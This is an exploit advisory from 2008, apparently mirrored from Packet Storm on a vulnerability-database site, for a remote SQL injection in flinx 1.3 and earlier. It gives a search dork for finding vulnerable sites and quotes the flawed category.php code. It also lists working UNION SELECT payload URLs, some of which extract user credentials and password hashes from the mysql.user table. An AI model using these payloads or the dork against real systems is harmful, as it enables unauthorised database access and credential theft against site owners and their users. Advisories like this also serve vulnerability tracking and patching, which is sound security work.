Lucene search
K

flinx-sql.txt

🗓️ 25 Jan 2008 00:00:00Reported by H-T TeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

flinx 1.3 & below, Remote SQL Injection Vulnerability, Download from rapidshar

Code
`--------------------------------------------------------------  
H-T Team [ HouSSaMix + ToXiC350 + RxH ]  
--------------------------------------------------------------  
# Author : Houssamix From H-T Team  
# Script : flinx 1.3 & below   
# Download : http://rapidshare.com/files/86100439/flinx.rar.html (Nulled)   
# BUG : Remote SQL Injection Vulnerability   
# Dork : Powered by Flinx  
  
## Vulnerable CODE :  
~~~~~~~ category.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
<?  
$query="SELECT linkID FROM $table_link WHERE relCatID=$id";  
$queryl=mysql_query($query);  
$count=mysql_numrows($queryl);  
$result=mysql_query("SELECT name FROM $table_cat WHERE catID=$id");  
if ($row=mysql_fetch_array($result)){  
do{  
?>  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
# Exploit :  
[Target.il]/[flinx_path]/category.php?id=[SQL-CODE]  
  
tables and columns names  
=> table : flinx_cat  
columns : name / catid  
=> table : flinx_link  
columns : name / url / image / relCatID / width / height  
  
exemple :  
http://site.com/flinx/category.php?id=-999 union select name from flinx_cat--  
  
we can also try get user and password from mysql.user :  
our user needs to be root@localhost or administrator mysql, check:  
http://site.com/flinx/category.php?id=-999/**/union/**/select/**/user()/*  
user and password from mysql.user:  
http://site.com/flinx/category.php?id=concat(user,0x203a3a20,password)/**/from/**/mysql.user/*  
  
# Gr33tz : CoNaN - V40 - Mahmood_ali - RaChiDoX & all muslims hackers   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation